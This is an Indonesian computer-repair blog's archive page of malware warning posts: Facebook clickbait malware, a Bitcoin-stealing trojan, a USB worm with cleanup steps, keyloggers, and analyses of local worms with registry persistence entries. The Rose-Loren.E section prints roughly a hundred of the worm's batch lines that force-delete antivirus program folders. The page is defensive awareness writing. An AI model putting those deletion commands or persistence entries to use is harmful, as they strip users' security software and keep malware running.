--> Panduan Servis Komputer dan Laptop: virus komputer | Deskripsi Singkat Blog di Sini

Panduan Servis Komputer dan Laptop adalah cara memperbaiki berbagai kerusakan atau error yang terjadi pada komputer ataupun laptop yang menyangkut software maupun hardware, cara memperbaiki komputer rusak, cara memperbaiki windows error, cara memperbaiki aplikasi error, cara memperbaiki printer rusak

Tampilkan postingan dengan label virus komputer. Tampilkan semua postingan
Tampilkan postingan dengan label virus komputer. Tampilkan semua postingan

12/29/2014

Waspadalah!!! Malware Video Gadis Mabuk di Facebook Mengancam Anda

Waspadalah!!! Malware Video Gadis Mabuk di Facebook Mengancam Anda

Waspadalah!!! Malware Video Gadis Mabuk di Facebook Mengancam Anda | Akhir-akhir ini pengguna facebook diresahkan oleh video gadis mabuk dengan gambar yang sangat fulgar menyebar di dinding kronolog mereka. Saya sendiri sempat melihat sekilah kiriman sebuah video dengan gambar yang sangat vulgar seperti gambar di bawah ini.

Dilihat dari gambarnya memang video ini sangat mengundang nafsu mouse untuk mengarah ke video tersebut dan mengkliknya. Ternyata benar banyak orang yang sudah tertarik dan mengklik link dari vidoe tersebut. Hasilnya luar biasa, seketita video berserta link tersebut menyebar secara otomatis ke seluruh teman pemilik akun facebook yang melakukan klik.

Setelah beberapa minggu, gambar atau video gadis mabuk vulgar di atas tidak terlihat lagi. Tapi kemudian baru-baru ini muncul lagi video gadis mabuk dengan gambr yang berbeda. Tapi, tetap masih mengandalkan judl video gadis mabuk dengan gambar yang sangat vulgar. Berikut screen shootnya.

Entah apa motiv dari penyebar video vulgaar gadis mabuk ini? Namun dari beberapa sumber didapat informasi bahwa link tersebut akan mengarahkan yang melakukan klik untuk mendownload sebuah software ucweb untuk android. Mungkin dari hal tersebut penyebar video mendapatkan keuntungan secara finansial.

Apapun motiv dari penyebar video, yang jelas ini sangat merugikan para pengguna facebook. Apalagi kalau sudah terlanjur melakukan klik, maka video vulgar gadis mabuk tersebut akan menyebar otomatis atas nama pengguna facebook yang melakukan klik. Jelas, ini sangat merugikan karena si pemilik akun akan merasa malu dengan teman-temannya karena telah menyebarkan  video yang tidak etis.

Saran saya bagi anda para pengguna facebook yang belum terlanjur melakukan klik terhadap link video vulgar gadis mabuk tersebut maka jangan coba-coba untuk mengkliknya. Jika anda melihat kiriman video tersebut maka lebih baik abaikan saja. Karena menurut beberapa sumber, pihak facebook sendiri kewalahan menghadapi malware ini. Sudah dibberantas namun kemudian muncul lagi dan lebih radikal.

12/16/2013

Waspadalah! Virus Bitcoin Mengancam Keamanan Kekayaan Anda

Waspadalah! Virus Bitcoin Mengancam Keamanan Kekayaan Anda



Waspadalah! Virus Bitcoin Mengancam Keamanan Kekayaan Anda ~ Virus Bitcoint adalah sebuah virus yang secara khusus bertujuan mendapaktan bicoint milik orang lain secara ilegal. Singkat kata, virus bitcoin adalah program yang dirancang untuk melakukan perampokan bitcoin milik anda.

Eit, mungkin di antara anda (termasuk saya) bertanya-tanya apa sih bicoint itu? Mengapa sangat berharaga, sehingga para cybercrime berusaha keras untuk mendapatkannya. Oke, agar tidak membingungkan, akan kita runtut dari awal. Sebelum membicarakan tentang virus bitcoin, kita pelajari dulu apa itu bitcoin.

Bitcoin adalah sebuah uang elektronik yang di buat pada tahun 2009 oleh Satoshi Nakamoto. Nama tersebut juga dikaitkan dengan perangkat lunak open source yang dia rancang, dan juga menggunakan jaringan peer-to-peer yang menghubungkan semuanya. Tidak seperti mata uang pada umumnya, bitcoin tidak tergantung dengan mempercayai penerbit utama. Bitcoin menggunakan sebuah database yang didistribusikan dan menyebar ke node - node dari sebuah jaringan P2P ke jurnal transaksi, dan menggunakan kriptografi untuk menyediakan fungsi - fungsi keamanan dasar, seperti memastikan bahwa bitcoin - bitcoin hanya dapat di habiskan oleh orang mempunyainya, dan tidak boleh dilakukan lebih dari satu kali. (sumber www.wikipedia.com)

Dari penjelasan singkat di atas, dapatlah kita simpulkan bahwa bitcoin adalah uang digital yang tersimpan secara online. Yang namanya harta kekayaan, dimanapun tempatnya pasti selalu menggoda nafsu para pencuri untuk mendapatkannya. Tidak terkecuali denan bitcoin. Terlebih saat ini uang digital Bitcoin mulai banyak dilirik oleh banyak kalangan karena bisa dipakai untuk membeli sejumlah produk, dari makanan hingga mobil mewah.

Namun waspadalah, karena virus pencuri Bitcoin sudah mulai beredar. Virus tersebut dinamai Bitcoin Alarm dan ditemukan oleh Kenny MacDermid, pengamat virus dari perusahaan software bernama Arbor Networks.

Bitcoin Alarm menyerang melalui email spam. Dalam email tersebut dituliskan sejumlah kata-kata yang mengajak calon korbannya untuk mengunjungi situs bitcoin-alarm.net.

Kemudian situs tersebut akan menawarkan sebuah aplikasi Windows penghasil Bitcoin. Link aplikasi pun dijanjikan akan dikirim melalui SMS.

Namun nyatanya itu bukanlah aplikasi penghasil Bitcoin, tapi merupakan virus pencuri berbagai informasi login korban di internet, terutama yang berhubungan dengan Bitcoin.

Melihat dari fungsi virus bitcoin di atas, yaitu untuk mendapatkan informasi login kita di internet, berarti bukan semata-mata bicoin yang menjadi sasaran, semua identitas login kita di internet menjadi terancam dengan adanya virus ini.

Jadi, berhati-hatilah ketika ada orang yang menawarkan aplikasi pendulang bitcoin atau dengan istilah software bitcoin mining. Dikhatirkan software tersebut merupakan virus yang siap merampok seluruh kekayaan online anda.

1/14/2013

Semua File dan Folder Pada Flashdisk Menjadi Exe

Semua File dan Folder Pada Flashdisk Menjadi Exe

Semua File dan Folder Pada Flashdisk Menjadi Exe - Itulah yang terjadi pada falshdisk isteri saya beberapa saat lalu. Mungkin anda juga pernah mengalaminya. Semua file dan folder pada falshdisk menjadi exe atau aplikasi. Nah, ini adalah indikasi bahwa flashdisk anda sudah terinfeksi virus. Jadi, ketika anda melihat semua file dan folder menjadi exe jangan coba-coba untuk membukanya. Kalau itu anda lakukan, maka virus akan menyebar menjangkiti system komputer anda. 

Bagaimana cara mengetahuinya? Untuk mengetahui apakah file dan folder menjadi exe atau tidak silalakan anda gunakan opsi detail pada windows explorer anda. Silakan anda klik pada icon pojok kanan atas (Change Your View) klik detail. 

Lihat dengan teliti pada bagian Type maka disitu akan tertulis Aplication, nah itu artinya apa yang anda lihat bukan file dan folder anda sebenarnya. Itu hanya virus yang menyamar sebgai file dan folder anda, sedangkan file dan folder asli sudah disembunyikan oleh virus dengan cara super hiden. Bagaimana cara mengatasinya? 

Cara pertama yang kita lakukan adalah mengembalikan file dan folder asli yang sudah disuper hiden oleh virus. Caranya sangat mudah, kita akan menggunakan DOS atau Command Prompt. Silakan anda ketik CMD pada Start - Search Program and File kemudian tekan Enter (Windows 7). Pertama DOS terbuka kita akan berada pada C:\user\foler. Silakan anda mauk pada drive dimana flashdisk anda berada. Misal, drive H, maka silakan ketik h: enter. Pada drive H, silakan anda ketik bari command ini :
ATTRIB -S -H -R *.* -S -D
Tunggu beberapa saat, sampai kursor kembali pada drive H. Sekarang silakan bukan flashdisk anda pada windows explorer. Eng ing eng.... semua file dan folder sudah kembali terlihat. Tapi sayang masih bercampur dengan file-file virus. Lalu bagaimana cara menghilangkan file virus tersebut.

Silakan anda ketik kolom search windows explorer *.exe (untuk memfilter agar yang muncul hanya file berekstensi exe saja). Setelah muncul, silakan anda blog semua kemudian tekan delet. Nah, sekarang file virus sudah bersih dari flasdisk anda.

Oh ya, anda yang terlewat nih. Virus yang menjangkiti flasdisk anda adalah virus porn.exe, secret.exe, x-mpeg. Kalau anda teliti pada langkah sebelum menghapus file virus, maka anda akan menemukan file-file exe tersebut.

Langkah di atas haya untuk menghilangkan virus porn.exe pada flashdisk, sedangkan jika anda ingin menghilangkan virus yang sudah menjangkiti system komputer anda, saya sarankan menggunakan Anti Virus AVG. Pada kasus di atas saya juga menggunakan Anti Virus AVG 2013. Kalau anda belum memilikinya, silakan anda download AVG 2013 full version di sini. Selain itu saya juga menggunakan USB Disk Security, silakan anda download usb disk securitu full version di sini.

Oke, itu aja dulu deh yang bisa saya share. Terus tarang saya merasa kesulitan untuk share ini, karena pada saat saya mengalami kasus di atas lupa tidak mengambil screen shootnya. Sehingga saya harus mencari referensi gambar dari blog lain yang kurang pas dengan pengalaman pribadi saya.

12/12/2012

Yuk Kita Mengenal Key Logger

Yuk Kita Mengenal Key Logger



Mari kita mengenal key logger. Udah lama nih saya tidak share pengetahuan umum tentang komputer. Selama ini selalu postig tips komputer, tutorial komputer, download software komputer gratis dan lain sebagainya yang lebih cenderung ke hal-hal praktik. Padahal belajar teori juga penting sebagai bekal pengetahuan. 

Sekarang kita akan bahas tentang keylogger. Apa itu key logger, cara kerja key logger, bagaimana asal mula keylogger, dan bagaimana menghadapi keylogger. Oke kita bahas satu persatu. Kita mulai dari apa itu keylogger.

Definsi Key Logger adalah  program tersembunyi yang difungsikan untuk memonitor setiap aktifitas penggunaan tombol keyboard. Dewasa ini key logger identik dengan pencurian data-data rahasia pada komputer korban. Sebuah metode hacking yang banyak digunakan oleh para hacker untuk mendapatkan apa yang mereka inginkan.

Cara Kerja Key Logger
Bagaimana keylogger ini berjalan pada komputer kita. Biasanya keylogger ditanamkan oleh para hacker ke komputer korban dengan menggunakan perantara virus dan trojan. Virus dan trojan yang mereka kirim itulah yang akan menginstal key logger pada komputer korban. Sehingga setelah key logger terinstal pada komputer korban, maka para hacker akan dengan mudah mengendalikan komputer korban termasuk mencuri data-data rahasia dari komputer korbannya.

Keylogger berjalan secara background (tersembunyi) tanpa diketahui pemilik komputer. Sesaat setelah keylogger diinstalkan di komputer, program akan berjalan setiap komputer restart dan sulit untuk terdeteksi. Anti virus kadang kala juga tidak mampu mendeteksi karena keylogger memang bukan didesain berbentuk virus.

Apabila keylogger telah berjalan, software ini akan memonitor setiap aktifitas tombol keyboard yang ditekan, kemudian menyimpannya dalam bentuk log (laporan) yang hanya dapat dilihat oleh orang yang menginstalkan keylogger. Keylogger akan menampilkan program atau alamat situr yang dibuka kemudian tombol apa yang diketikkan.

Asal Mula KeyLogger
Sebenarnya key logger ini pada mulanya dibuat untuk kepentingan positif yaitu untuk melakukan pengamanan pemantauan terhadap komputer klien dalam sebuah jaringan. Namun selanjutnya kemampuan keylogger banyak digunakan untuk menyadap komputer orang lain dan mencuri informasi-informasi penting seperti username dan password e-mail, login account, kartu kredit, dll.

Bagaimana Menghadapi Key Logger
Sudah tahu kan sekarang apa itu keylogger, bagaimana fungsinya dan apa akibatnya kalau komputer kita terinstal key logger di dalamnya. Maka untuk mengambil langkah aman dari pencurian data yang dilakukan oleh keylogger kita harus melakukan antisipasi secara dini. Bagaimana antisipasinya.

Yang paling penting adalah tindakan pencegahan. Kita harus melakukan pencegahan agar komputer kita tidak menjadi sasaran empuk para hacker jahat denga key loggernya. 
1. Pertama kita harus hati-hati dengan semua program yang kita sendiri tidak tahu persis kegunaanya, jangan sembarangan menginstal program.
2. Kedua selalu cegah dengan anti virus terbaik dan selalu update anti virus tersebut.
3. Instal ant key logger pada komputer anda
4. Gunakan virtual keyboard saat akan melakukan input data rahasia pada komputer anda.

7/08/2012

no image

Hati-Hati Anda Terjebak Hack Toolz

Anda suka mencari HackToolz. Hack Facebook, hack jaringan dan banyak lagi keyword yang digunakan oleh anda untuk mendapatkan tutorial atau tools tertentu untuk melakukan aktivitas hacking. Sebagai seorang pemula dalam bidng hacking, berburu hacking tool atau alat untuk hacking adalah hal yang sering dilakukan. Namun karena kurangnya pemahaman tentang tool atau alat hacking sering malah kita sendiri yang menjadi korban hacking. Maksud hati ingin menghack user dan pasword orang lain tapi malah pc da flashdisk kita dipenuhi oleh worm. Berikut adalah informasi tentang worm yang menyerupai hacking tool.


A. Info File
Nama Malware : HackToolz
Asal : Jakarta
Ukuran File : 100 KB (102,400 bytes)
Packer : ~
Pemrograman : Visual Basic
Icon : Installer
Tipe : MS Visual Basic 5.0-6.0

B. About Malware

Mirip seperti worm yang pernah dibahas sebelumnya, yaitu worm Angel2 dan worm Pikir. Ciri utama adalah memperbanyak diri, namun ada yang menarik dari worm HackToolz. Setelah di-eksekusi, worm ini akan membuat sebuah pesan yang selalu mengulang dan tidak bisa dihentikan seperti gambar diatas, kecuali langsung menggunakan Task Manager atau tool process viewer lainnya seperti Process Hacker atau Process Explorer.

Worm yang terbilang cukup sederhana, dan mungkin bisa dikatakan juga worm yang belum selesai atau memiliki bugs. Karena beberapa procedure yang seharusnya dijalankan, tidak sesuai dengan apa yang dihasilkan. Contohnya adalah men-disable tool Windows seperti Command Prompt yang meski worm HackTools telah aktif di memory, Command Prompt tetap bisa dijalankan. Berikut ini adalah penggalan string pada HackToolz.


C. Companion/File yang dibuat
Terdapat beberapa path yang dijadikan tempat menyimpan host serta companion worm HackToolz. Contohnya seperti:
1. Folder Drives di system32.
Dibuat dengan nama acak dan ada juga yang menggunakan ekstensi .sys.
2. Root drive.
Pada setiap root drive, terdapat 2 buah file companion yang juga menggunakan nama acak. Tanpa autorun, companion ini hanya menunggu user untuk mengeksekusinya.
3. Removable Disk.
Disaat user disibukkan dengan message box yang tidak bisa di-close, worm HackToolz mengcopykan companion yang cukup banyak ke dalam flash disk. Ditambah lagi dengan nama-nama yang acak dan pada awal penamaannya menggunakan karakter unicode Segitiga Penrose (https://id.wikipedia.org/wiki/Segitiga_Penrose)


D. Hasil Infeksi
File yang dibuat pada flash disk sepertinya adalah efek terbesar yang dibuat oleh worm HackToolz. Dalam waktu singkat, worm HackToolz dapat membuat companion pada flash disk dengan jumlah yang tidak sedikit seperti pada gambar berikut ini.

Selain itu, terdapat juga beberapa companion yang namanya menggunakan karakter unicode, dan jika dieksekusi maka akan berakibat Windows mengalami Blue Screen Of Dead (BSOD).

Worm HackToolz juga membuat  cukup banyak modifikasi pada registry, dan salah satunya adalah menambahkan entry untuk menjalankan hostnya pada saat proses startup. Entry untuk startup ini dibuat terlalu banyak sehingga bisa mengakibatkan Windows harus melakukan recovery sistem setelah proses seperti yang terlihat pada gambar berikut ini.


E. Pembersihan



PCMAV 7.2 Update Build1
Untuk membasmi virus ini ataupun varian virus lainnya, PCMAV 7.2 Update Build1 telah hadir dengan penambahan 23 pengenal varian virus baru. Bagi Anda pengguna PCMAV 7.2, sangat disarankan segera melakukan update, agar PCMAV Anda dapat mengenali dan membasmi virus lebih banyak lagi.
Untuk mendapatkan dan menggunakan update PCMAV ini, Anda cukup menjalankan PCMAV.exe, komputer harus dalam keadaan aktif terhubung ke Internet. Jika koneksi Internet menggunakan proxy, tentukan konfigurasi proxy pada menu Setup – Updater. Fitur Automatic Updates dari PCMAV akan secara otomatis men-download dan meng-update database dari PCMAV. Anda juga dapat mengupdate kapan saja dengan klik tombol “Check for Updates” pada menu Update.
Bagi Anda yang ingin mendapatkan file update tersebut secara manual, Anda bisa men-download file-nya melalui link ini:
SendSpace.com
Letakkan file hasil download tersebut (vx1.sig) ke dalam folder \vdb. Jika sebelumnya telah terdapat file update yang lama, Anda cukup menimpanya. Pastikan sekali lagi, bahwa nama file update adalah vx1.sig, jika berbeda, cukup ubah namanya. Dan nanti saat Anda kembali menjalankan PCMAV, ia sudah dalam keadaan kondisi ter-update.

Daftar tambahan virus hingga PCMAV 7.2 Update Build1:
Abgila
Autorunme.H
ECleaner
FakeDownloader.FP
FakeDownloader.FQ
FakeDownloader.FR
FakeDownloader.FS
GPCode.C
HackToolz
InFrom.B
Lamechi
list.txt
MountSide
MountSide.exe
PInject.AQ
PInject.AR
PInject.AS
PInject.AT
PInject.AU
Protector
Reader.A
Reader.B
SysAnti
Toffse

Sumber : www.virusindonesia.com

4/14/2012

no image

Microshit vs Alisie.vbs - Worm Yang Memenuhi Ruang Hardisk


Microshit dan Alisie.vbs. Bisa digambarkan seperti Mr. and Mrs. Smith. Berbeda akan tetapi memiliki fungsi serta kemampuan yang sama dalam melakukan payload. Worm yang mengcopy dirinya sendiri kemudian menyebar ke setiap subfolder bukanlah hal yang baru, akan tetapi kemampuan tersebut memang sebuah ciri khas sebuah worm.

A. Info File
Nama Worm : Microshit
Asal : Bekasi
Ukuran File : 460 KB (471,040 bytes)
Packer : ~
Pemrograman : Borland Delphi ( 2.0 – 7.0 ) 1992 – www.borland.com
Icon : Notepad (Windows Seven)
Tipe : Worm
Nama Worm : Alisie.vbs
Asal : Jakarta
Ukuran File : 1.54 KB (1,583 bytes)
Packer : ~
Pemrograman : Visual Basic Script
Icon : VBS File
Tipe : Worm
B. About Malware

Pembahasan kali ini cukup berbeda, karena biasanya hanya membahas 1 analisa virus. Microshit dan Alisie.vbs adalah 2 buah tipe worm yang dibuat dengan menggunakan bahasa pemrograman yang berbeda. Untuk worm Microshit, dibuat dengan menggunakan bahasa pemrograman Delphi dan untuk worm Alisie.vbs masih dengan metode lama yaitu menggunakan bahasa pemrograman Visual Basic Script.
Meski hasil infeksi dari worm ini sama, yaitu memperbanyak diri dan memenuhi harddisk, tetapi ada sedikit perbedaan. Pada worm Alisie.vbs, tidak secara terus menerus melakukan payload untuk menggandakan diri. Dan setelah semua file companion tercipta, maka proses Alisie.vbs akan dihentikan. Namun pada worm Microshit, meski file companion sudah tercipta, prosesnya tetap aktif di memory.
Berikut ini adalah string yang terdapat pada tubuh worm Microshit.
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
000000072592   000000478D92      0   HTMLText.Strings
0000000725A4   000000478DA4      0   O
0000000725F5   000000478DF5      0   !color="#FF0000">PESAN
00000007261F   000000478E1F      0   Terimakasih telah berpartisipasi mempelajari celah keamanan software saya. Saya sangat menghargai kemampuan anda jika tujuan anda benar-benar
0000000726AF   000000478EAF      0   untuk membangun kami para developer agar lebih berkembang. Dan saya mohon maaf jika aplikasi ini mengganggu komputer anda, karena beberapa
00000007273C   000000478F3C      0   dari yang anda lakukan telah sangat merugikan saya. Saya punya keluarga dan saudara yang harus saya nafkahi, dan anda pun tentunya tak ingin
0000000727CA   000000478FCA      0   'keluarga anda kesulitan mencari nafkah.
0000000727F4   000000478FF4      0  
0000000727FB   000000478FFB      0   Jika anda tidak sekedar bertujuan merusak tolong berikan solusi dari kelemahan aplikasi yang saya buat. Dan saya harap anda bukan seorang yang
00000007288C   00000047908C      0   frustasi yang mengambil jalan pintas yang cepat untuk mendapatkan uang. Jika anda merasa apa yang saya buat terlalu mahal, perlu anda ketahui
00000007291C   00000047911C      0   bahwa saya mengerjakannya tidak hanya satu atau dua malam saja, saya melalui proses yang lama dan sangat berharap mampu memberi kepuasan
0000000729A6   0000004791A6      0   ]kepada orang-orang yang telah percaya kepada saya dengan membeli dari apa yang saya kerjakan.
000000072A06   000000479206      0  
000000072A0D   00000047920D      0   Ya mungkin "anda" bangga dengan kemampuan otak anda yang mungkin tak banyak orang memilikinya. Dan anda mungkin juga mengharap kami
000000072A93   000000479293      0   para developer merengek mengharap belas kasihan anda. Dibalik senyum anda ada derita orang lain, dan suatu saat akan berbalik entah itu pada anak
000000072B26   000000479326      0   ?anda, cucu anda, buyut anda dan mungkin juga pada anda sendiri.
000000072B68   000000479368      0   ParentColor
C. Companion/File yang dibuat

Sudah jelas kedua worm ini membuat banyak companion pada setiap root drive sampai subfolder, namun yang berbeda adalah pada penamaannya. Untuk worm Alisie.vbs akan membuat companion dengan nama sesuai dengan nama subfolder yang ada. Dan untuk worm Microshit, companion yang dibuat pada subfolder seluruhnya menggunakan nama acak.

D. Hasil Infeksi
Setelah semua subfolder sudah disisipi oleh worm Alisie.vbs, worm tersebut akan memberikan sebuah pesan seperti di bawah ini yang menandakan prosesnya selesai dan payloadnya dihentikan.

Bisa dikatakan ini adalah perbedaan yang paling mendasar antara worm Alisie.vbs dengan worm Microshit. Karena worm microshit melakukan modifikasi pada registry entry:
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run [path host worm yang dieksekusi]
1
2
3
HKEY_CLASSES_ROOT\txtfile(default)                         -> Text File
HKEY_CLASSES_ROOT\txtfile\shell\open\command(default)      -> Path host yang di eksekusi
HKEY_CLASSES_ROOT\txtfile\DefaultIcon (default)            -> Path host yang di eksekusi
E. Pembersihan


PCMAV 6.5 Update Build1

Untuk membasmi virus ini ataupun varian virus lainnya, PCMAV 6.5 Update Build1 telah hadir dengan penambahan 27 pengenal varian virus baru. Bagi Anda pengguna PCMAV 6.5, sangat disarankan segera melakukan update, agar PCMAV Anda dapat mengenali dan membasmi virus lebih banyak lagi.
Untuk mendapatkan dan menggunakan update PCMAV ini, Anda cukup menjalankan PCMAV.exe, komputer harus dalam keadaan aktif terhubung ke Internet. Jika koneksi Internet menggunakan proxy, tentukan konfigurasi proxy pada file proxy.txt. Fitur Automatic Updates dari PCMAV akan secara otomatis men-download dan meng-update database dari PCMAV. Anda juga dapat mengupdate kapan saja dengan klik kanan icon PCMAV pada system tray dan pilih Update.
Bagi Anda yang ingin mendapatkan file update tersebut secara manual, Anda bisa men-download file-nya melalui beberapa link ini:
SendSpace.com
ZippyShare.com (mirror)
RapidShare.com (mirror)
Letakkan file hasil download tersebut (update.vdb) ke dalam folder \vdb. Jika sebelumnya telah terdapat file update yang lama, Anda cukup menimpanya. Pastikan sekali lagi, bahwa nama file update adalah update.vdb, jika berbeda, cukup ubah namanya. Dan nanti saat Anda kembali menjalankan PCMAV, ia sudah dalam keadaan kondisi ter-update.
Daftar tambahan virus hingga PCMAV 6.5 Update Build1:
Alisie.vbs
Angel2.C
Autoruner.F
Autoruner.F.inf
BlackN.L
BlackN.L.inf.A
BlackN.L.inf.B
BlackN.M
BlackN.O
BlackN.P
BlackN.Q
BlackN.R
FakeDownloader.FE
FakeDownloader.FF
Microshit
NgrBot.AW
NgrBot.AX
ORC-Dec
ProRat.E
SlenfBot.A
SlenfBot.B
Spatet
Spatet.inf
SystemCheck
SystemCheck.tmp
Winlogon.C

Sumber : http://virusindonesia.com

2/08/2012

no image

Review Malware Sepanjang Tahun 2011

Review Malware Sepanjang Tahun 2011 selain sebagai pengetahuan kita tentang beberapa malware juga sebagai kilas balik malware apa saja yang pernah menyebar di tahun 2011 lalu. Tentu malware-malware tersebut di tahun 2012 ini juga masih menunjukkan eksistensinya. Makanya tidak salah kalau sobat memabca artikel ini agar mengetahui lebih banyak tentang malware dan lebih waspada. 

Berakhirnya tahun 2011 seakan tidak mempengaruhi eksistensi penyebaran malware baru, maupun varian baru dari malware yang sudah dikenali. Mereka menyebar antara lain melalui shortcut, autorun, removable disk, koneksi jaringan dan internet. Beberapa malware bahkan hangat dibahas selama berbulan-bulan antara lain Stuxnet dan Ramnit. Ditambah lagi dengan pendatang baru NgrBot yang  mencuri setiap akun user yang di infeksinya, dan mungkin bisa dikatakan, bahwa 2011 masih merupakan tahun keemasan bagi NgrBot.

Berikut ini adalah 12 malware yang pernah di review sebelumnya dan cukup menarik untuk dibahas karena memiliki kemampuan payload atau aksi tertentu.
1. Delp-Shortcut (Januari)
Sempat banyak dilaporkan di akhir tahun 2010 sampai akhir januari 2011. Ciri utamanya adalah membuat 5 buah shortcut dengan nama seperti:
- Documment and Settings.lnk
- Program Files. lnk
- RECYCLER.lnk
- System Volume Information.lnk
- WINDOWS.lnk
Hostnya bernama mso.sys dan sebenarnya adalah file DLL (Dynamic Link Library). Delp-Shortcut seringkali membuat crash Explorer dan shortcut yang dibuatnya sama seperti shortcut Ramnit atau Stuxnet yang memiliki kemampuan untuk mengeksekusi secara otomatis setelah terhubung dengan komputer tanpa sepengetahuan user (shortcut exploit).
2. Rose-Loren.E (Februari)
Worm lokal yang merupakan hasil modifikasi varian sebelumnya ini tetap menunjukan kesan “Asli Indonesia”. Pesan berupa gambar dan puisi ini sangat menarik untuk diliat. Meski begitu, tetap saja worm ini termasuk worm yang sangat berbahaya. Karena selain bersifat menyebar dan memberikan pesan-pesan dari virus maker-nya, Rose-Loren.E juga akan menghapus seluruh file milik antivirus luar seperti yang terlihat pada source code salah satu companion dari Rose-Loren.E.
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
del /f /q /s  C:\ESET\*.* >nul
del /f /q /s  C:\antivi~1\*.* >nul
del /f /q /s  C:\antivi~2\*.* >nul
del /f /q /s  C:\antiviru\*.* >nul
del /f /q /s  C:\avg\*.* >nul
del /f /q /s  C:\kasper~1\*.* >nul
del /f /q /s  C:\kasper~2\*.* >nul
del /f /q /s  C:\mcafee\*.* >nul
del /f /q /s  C:\mcafee.com\agent\*.* >nul
del /f /q /s  C:\mcafee.com\*.* >nul
del /f /q /s  C:\mcafee.com\VSO\*.* >nul
del /f /q /s  C:\mcafee~1\*.* >nul
del /f /q /s  C:\msav\*.* >nul
del /f /q /s  C:\norman\*.* >nul
del /f /q /s  C:\norton~1\*.* >nul
del /f /q /s  C:\norton~2\*.* >nul
del /f /q /s  C:\pav\*.* >nul
del /f /q /s  C:\pccill~1\*.* >nul
del /f /q /s  C:\iolo\*.* >nul
del /f /q /s  C:\progra~1\ESET\*.* >nul
del /f /q /s  C:\progra~1\antivi~1\*.* >nul
del /f /q /s  C:\progra~1\antivi~2\*.* >nul
del /f /q /s  C:\progra~1\avg\*.* >nul
del /f /q /s  C:\progra~1\kasper~1\*.* >nul
del /f /q /s  C:\progra~1\kasper~2\*.* >nul
del /f /q /s  C:\progra~1\mcafee\*.* >nul
del /f /q /s  C:\progra~1\McAfee.com\agent\*.* >nul
del /f /q /s  C:\progra~1\McAfee.com\\*.* >nul
del /f /q /s  C:\progra~1\McAfee.com\VSO\*.* >nul
del /f /q /s  C:\progra~1\mcafee~1\*.* >nul
del /f /q /s  C:\progra~1\mindso~1\*.* >nul
del /f /q /s  C:\progra~1\norman\*.* >nul
del /f /q /s  C:\progra~1\norton~1\*.* >nul
del /f /q /s  C:\progra~1\norton~2\*.* >nul
del /f /q /s  C:\progra~1\pandas~1\*.* >nul
del /f /q /s  C:\Progra~1\Alwils~1\*.* >nul
del /f /q /s  C:\progra~1\iolo\*.* >nul
del /f /q /s /a:h  C:\ESET\*.* >nul
del /f /q /s /a:h  C:\antivi~1\*.* >nul
del /f /q /s /a:h  C:\antivi~2\*.* >nul
del /f /q /s /a:h  C:\antiviru\*.* >nul
del /f /q /s /a:h  C:\avg\*.* >nul
del /f /q /s /a:h  C:\kasper~1\*.* >nul
del /f /q /s /a:h  C:\kasper~2\*.* >nul
del /f /q /s /a:h  C:\mcafee\*.* >nul
del /f /q /s /a:h  C:\mcafee.com\agent\*.* >nul
del /f /q /s /a:h  C:\mcafee.com\VSO\*.* >nul
del /f /q /s /a:h  C:\mcafee~1\*.* >nul
del /f /q /s /a:h  C:\msav\*.* >nul
del /f /q /s /a:h  C:\norman\*.* >nul
del /f /q /s /a:h  C:\norton~1\*.* >nul
del /f /q /s /a:h  C:\norton~2\*.* >nul
del /f /q /s /a:h  C:\pav\*.* >nul
del /f /q /s /a:h  C:\pccill~1\*.* >nul
del /f /q /s /a:h  C:\pc-cil~1\*.* >nul
del /f /q /s /a:h  C:\iolo\*.* >nul
del /f /q /s /a:h  C:\progra~1\ESET\*.* >nul
del /f /q /s /a:h  C:\progra~1\antivi~1\*.* >nul
del /f /q /s /a:h  C:\progra~1\antivi~2\*.* >nul
del /f /q /s /a:h  C:\progra~1\avg\*.* >nul
del /f /q /s /a:h  C:\progra~1\kasper~1\*.* >nul
del /f /q /s /a:h  C:\progra~1\kasper~2\*.* >nul
del /f /q /s /a:h  C:\progra~1\mcafee\*.* >nul
del /f /q /s /a:h  C:\progra~1\mcafee.com\agent\*.* >nul
del /f /q /s /a:h  C:\progra~1\mcafee.com\*.* >nul
del /f /q /s /a:h  C:\progra~1\mcafee.com\VSO\*.* >nul
del /f /q /s /a:h  C:\progra~1\mcafee~1\*.* >nul
del /f /q /s /a:h  C:\progra~1\mindso~1\*.* >nul
del /f /q /s /a:h  C:\progra~1\norman\*.* >nul
del /f /q /s /a:h  C:\progra~1\norton~1\*.* >nul
del /f /q /s /a:h  C:\progra~1\norton~2\*.* >nul
del /f /q /s /a:h  C:\progra~1\pandas~1\*.* >nul
del /f /q /s /a:h  C:\Progra~1\Alwils~1\*.* >nul
del /f /q /s /a:h  C:\progra~1\iolo\*.* >nul
del /f /q /s /a:R  C:\ESET\*.* >nul
del /f /q /s /a:R  C:\antivi~1\*.* >nul
del /f /q /s /a:R  C:\antivi~2\*.* >nul
del /f /q /s /a:R  C:\antiviru\*.* >nul
del /f /q /s /a:R  C:\avg\*.* >nul
del /f /q /s /a:R  C:\kasper~1\*.* >nul
del /f /q /s /a:R  C:\kasper~2\*.* >nul
del /f /q /s /a:R  C:\mcafee\*.* >nul
del /f /q /s /a:R  C:\mcafee.com\agent\*.* >nul
del /f /q /s /a:R  C:\mcafee.com\*.* >nul
del /f /q /s /a:R  C:\mcafee.com\VSO\*.* >nul
del /f /q /s /a:R  C:\mcafee~1\*.* >nul
del /f /q /s /a:R  C:\msav\*.* >nul
del /f /q /s /a:R  C:\norman\*.* >nul
del /f /q /s /a:R  C:\norton~1\*.* >nul
del /f /q /s /a:R  C:\norton~2\*.* >nul
del /f /q /s /a:R  C:\pav\*.* >nul
del /f /q /s /a:R  C:\pccill~1\*.* >nul
del /f /q /s /a:R  C:\pc-cil~1\*.* >nul
del /f /q /s /a:R  C:\iolo\*.* >nul
del /f /q /s /a:R  C:\progra~1\ESET\*.* >nul
del /f /q /s /a:R  C:\progra~1\antivi~1\*.* >nul
del /f /q /s /a:R  C:\progra~1\antivi~2\*.* >nul
del /f /q /s /a:R  C:\progra~1\avg\*.* >nul
del /f /q /s /a:R  C:\progra~1\kasper~1\*.* >nul
